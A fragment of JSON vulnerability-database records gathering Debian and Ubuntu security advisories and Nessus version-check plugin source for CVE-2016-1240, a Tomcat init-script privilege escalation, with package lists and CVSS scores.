"https://lists.debian.org/debian-lts-announce/2016/debian-lts-announce-201609/msg00015.html", "title": "[SECURITY] [DLA 622-1] tomcat6 security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2019-05-30T02:21:18", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3670-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nSeptember 15, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : tomcat8\nCVE ID : CVE-2016-1240\n\nDawid Golunski of LegalHackers discovered that the Tomcat init script\nperformed unsafe file handling, which could result in local privilege\nescalation.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 8.0.14-1+deb8u3.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your tomcat8 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2016-09-15T17:28:15", "published": "2016-09-15T17:28:15", "id": "DEBIAN:DSA-3670-1:7364A", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2016/msg00249.html", "title": "[SECURITY] [DSA 3670-1] tomcat8 security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2019-11-01T02:21:28", "bulletinFamily": "scanner", "description": "Dawid Golunski of LegalHackers discovered that the Tomcat init script\nperformed unsafe file handling, which could result in local privilege\nescalation.", "modified": "2019-11-02T00:00:00", "id": "DEBIAN_DSA-3669.NASL", "href": "https://www.tenable.com/plugins/nessus/93548", "published": "2016-09-16T00:00:00", "title": "Debian DSA-3669-1 : tomcat7 - security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package 
checks in this plugin were \n# extracted from Debian Security Advisory DSA-3669. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93548);\n script_version(\"2.7\");\n script_cvs_date(\"Date: 2018/11/10 11:49:38\");\n\n script_cve_id(\"CVE-2016-1240\");\n script_xref(name:\"DSA\", value:\"3669\");\n\n script_name(english:\"Debian DSA-3669-1 : tomcat7 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Dawid Golunski of LegalHackers discovered that the Tomcat init script\nperformed unsafe file handling, which could result in local privilege\nescalation.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/tomcat7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2016/dsa-3669\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the tomcat7 packages.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 7.0.56-3+deb8u4.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libservlet3.0-java\", reference:\"7.0.56-3+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libservlet3.0-java-doc\", reference:\"7.0.56-3+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libtomcat7-java\", reference:\"7.0.56-3+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat7\", reference:\"7.0.56-3+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat7-admin\", reference:\"7.0.56-3+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat7-common\", reference:\"7.0.56-3+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat7-docs\", reference:\"7.0.56-3+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat7-examples\", reference:\"7.0.56-3+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat7-user\", reference:\"7.0.56-3+deb8u4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse 
audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:21:28", "bulletinFamily": "scanner", "description": "Dawid Golunski of LegalHackers discovered that the Tomcat init script\nperformed unsafe file handling, which could result in local privilege\nescalation.", "modified": "2019-11-02T00:00:00", "id": "DEBIAN_DSA-3670.NASL", "href": "https://www.tenable.com/plugins/nessus/93549", "published": "2016-09-16T00:00:00", "title": "Debian DSA-3670-1 : tomcat8 - security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3670. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93549);\n script_version(\"2.7\");\n script_cvs_date(\"Date: 2018/11/10 11:49:38\");\n\n script_cve_id(\"CVE-2016-1240\");\n script_xref(name:\"DSA\", value:\"3670\");\n\n script_name(english:\"Debian DSA-3670-1 : tomcat8 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Dawid Golunski of LegalHackers discovered that the Tomcat init script\nperformed unsafe file handling, which could result in local privilege\nescalation.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/tomcat8\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2016/dsa-3670\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the tomcat8 packages.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 8.0.14-1+deb8u3.\"\n );\n 
script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libservlet3.1-java\", reference:\"8.0.14-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libservlet3.1-java-doc\", reference:\"8.0.14-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libtomcat8-java\", reference:\"8.0.14-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat8\", reference:\"8.0.14-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat8-admin\", reference:\"8.0.14-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat8-common\", reference:\"8.0.14-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat8-docs\", reference:\"8.0.14-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat8-examples\", reference:\"8.0.14-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat8-user\", reference:\"8.0.14-1+deb8u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:20:39", "bulletinFamily": "scanner", "description": "Dawid Golunski from legalhackers.com discovered that Debian", "modified": "2019-11-02T00:00:00", "id": "DEBIAN_DLA-622.NASL", "href": "https://www.tenable.com/plugins/nessus/93544", "published": 
"2016-09-16T00:00:00", "title": "Debian DLA-622-1 : tomcat6 security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-622-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93544);\n script_version(\"2.8\");\n script_cvs_date(\"Date: 2018/09/05 12:31:21\");\n\n script_cve_id(\"CVE-2016-1240\");\n\n script_name(english:\"Debian DLA-622-1 : tomcat6 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Dawid Golunski from legalhackers.com discovered that Debian's version\nof Tomcat 6 was vulnerable to a local privilege escalation. Local\nattackers who have gained access to the server in the context of the\ntomcat6 user through a vulnerability in a web application were able to\nreplace the file with a symlink to an arbitrary file.\n\nThe full advisory can be found at\n\nhttp://legalhackers.com/advisories/Tomcat-Debian-based-Root-Privilege-\nEs calation-Exploit.txt\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n6.0.45+dfsg-1~deb7u2.\n\nWe recommend that you upgrade your tomcat6 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n # http://legalhackers.com/advisories/Tomcat-Debian-based-Root-Privilege-Es\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c0b304c1\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2016/09/msg00015.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/tomcat6\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libservlet2.4-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libservlet2.5-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libservlet2.5-java-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libtomcat6-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat6-admin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat6-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat6-docs\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:debian:debian_linux:tomcat6-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat6-extras\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat6-user\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libservlet2.4-java\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libservlet2.5-java\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libservlet2.5-java-doc\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libtomcat6-java\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"tomcat6\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"tomcat6-admin\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"tomcat6-common\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;\nif 
(deb_check(release:\"7.0\", prefix:\"tomcat6-docs\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"tomcat6-examples\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"tomcat6-extras\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"tomcat6-user\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:20:39", "bulletinFamily": "scanner", "description": "Dawid Golunski from legalhackers.com discovered that Debian", "modified": "2019-11-02T00:00:00", "id": "DEBIAN_DLA-623.NASL", "href": "https://www.tenable.com/plugins/nessus/93545", "published": "2016-09-16T00:00:00", "title": "Debian DLA-623-1 : tomcat7 security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-623-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93545);\n script_version(\"2.6\");\n script_cvs_date(\"Date: 2018/07/09 14:30:26\");\n\n script_cve_id(\"CVE-2016-1240\");\n\n script_name(english:\"Debian DLA-623-1 : tomcat7 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Dawid Golunski from legalhackers.com discovered that Debian's version\nof Tomcat 7 was vulnerable to a local privilege escalation. 
Local\nattackers who have gained access to the server in the context of the\ntomcat7 user through a vulnerability in a web application were able to\nreplace the file with a symlink to an arbitrary file.\n\nThe full advisory can be found at\n\nhttp://legalhackers.com/advisories/Tomcat-Debian-based-Root-Privilege-\nEscalation-Exploit.txt\n\nIn addition this security update also fixes Debian bug #821391. File\nownership in /etc/tomcat7 will no longer be unconditionally overridden\non upgrade. As another precaution the file permissions of Debian\nspecific configuration files in /etc/tomcat7 were changed to 640 to\ndisallow world readable access.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n7.0.28-4+deb7u6.\n\nWe recommend that you upgrade your tomcat7 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n # http://legalhackers.com/advisories/Tomcat-Debian-based-Root-Privilege-Escalation-Exploit.txt\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f1cb3176\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2016/09/msg00016.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/tomcat7\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libservlet3.0-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libservlet3.0-java-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libtomcat7-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7-admin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7-user\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 
0;\nif (deb_check(release:\"7.0\", prefix:\"libservlet3.0-java\", reference:\"7.0.28-4+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libservlet3.0-java-doc\", reference:\"7.0.28-4+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libtomcat7-java\", reference:\"7.0.28-4+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"tomcat7\", reference:\"7.0.28-4+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"tomcat7-admin\", reference:\"7.0.28-4+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"tomcat7-common\", reference:\"7.0.28-4+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"tomcat7-docs\", reference:\"7.0.28-4+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"tomcat7-examples\", reference:\"7.0.28-4+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"tomcat7-user\", reference:\"7.0.28-4+deb7u6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:31:08", "bulletinFamily": "scanner", "description": "Dawid Golunski discovered that the Tomcat init script incorrectly\nhandled creating log files. A remote attacker could possibly use this\nissue to obtain root privileges. (CVE-2016-1240)\n\nThis update also reverts a change in behaviour introduced in\nUSN-3024-1 by setting mapperContextRootRedirectEnabled to True by\ndefault.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "UBUNTU_USN-3081-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93600", "published": "2016-09-20T00:00:00", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 16.04 LTS : tomcat6, tomcat7, tomcat8 vulnerability (USN-3081-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3081-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93600);\n script_version(\"2.8\");\n script_cvs_date(\"Date: 2019/09/18 12:31:46\");\n\n script_cve_id(\"CVE-2016-1240\");\n script_xref(name:\"USN\", value:\"3081-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 16.04 LTS : tomcat6, tomcat7, tomcat8 vulnerability (USN-3081-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Dawid Golunski discovered that the Tomcat init script incorrectly\nhandled creating log files. A remote attacker could possibly use this\nissue to obtain root privileges. (CVE-2016-1240)\n\nThis update also reverts a change in behaviour introduced in\nUSN-3024-1 by setting mapperContextRootRedirectEnabled to True by\ndefault.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3081-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libtomcat6-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libtomcat7-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libtomcat8-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:tomcat6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:tomcat8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/20\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04|14\\.04|16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ 